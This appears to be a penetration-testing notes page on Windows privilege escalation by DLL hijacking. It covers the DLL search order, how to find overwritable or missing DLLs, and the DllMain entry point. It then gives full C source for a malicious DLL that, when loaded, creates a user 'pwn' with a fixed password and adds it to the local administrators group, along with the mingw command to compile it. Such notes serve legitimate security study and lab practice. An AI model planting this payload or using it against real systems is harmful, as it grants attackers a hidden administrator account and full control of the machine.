Windows Privilege Escalation with DLL Hijacking

Contains the details of the topic Privilege Escalation/Windows/Various/DLL Injection.

Similar to Modifiable Service Binaries but with DLLs (Dynamic Link Libraries).

We can:

• Overwrite a DLL

• Hijack the DLL search order

• Exploit a missing DLL

Search Order

The default DLL search order used by the system depends on whether Safe DLL Search Mode is activated. By default it is enabled.

With this mode enabled, applications search for necessary DLL files in the following sequence:

1. The directory from which the application is loaded.

2. The system directory.

3. The 16-bit system directory.

4. The Windows directory.

5. The current directory.

6. The directories that are listed in the PATH environment variable.

However, if 'Safe DLL Search Mode' is deactivated, the search order changes to:

1. The directory from which the application is loaded.

2. The current directory.

3. The system directory.

4. The 16-bit system directory.

5. The Windows directory

6. The directories that are listed in the PATH environment variable

Pinpoint a DLL

View service DLLs. See the permissions of those DLLs, whether they are editable and therefore overwritable, or whether they are missing.

• Process Explorer (it also shows DLLs used for each process)

Malicious DLL

Each DLL can have an optional entry point function called DllMain, which is executed when processes or threads attach the DLL. This function usually contains four cases called DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH, DLL_PROCESS_DETACH.

myDLL.c

#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain( HANDLE hModule,// Handle to DLL module
		       DWORD ul_reason_for_call,// Reason for calling function 
		       LPVOID lpReserved ) // Reserved
{
	switch ( ul_reason_for_call ) 
	{
		case DLL_PROCESS_ATTACH: // A process is loading the DLL.
			int i;
			i = system ("net user pwn password123! /add");
			i = system ("net localgroup administrators pwn /add"); 
			break;
		case DLL_THREAD_ATTACH: // A process is creating a new thread.
			break;
		case DLL_THREAD_DETACH: // A thread exits normally.
			break;
		case DLL_PROCESS_DETACH: // A process unloads the DLL.
			break;
	}
  return TRUE;
}

x86_64-w64-mingw32-gcc myDLL.c --shared -o myDLL.dll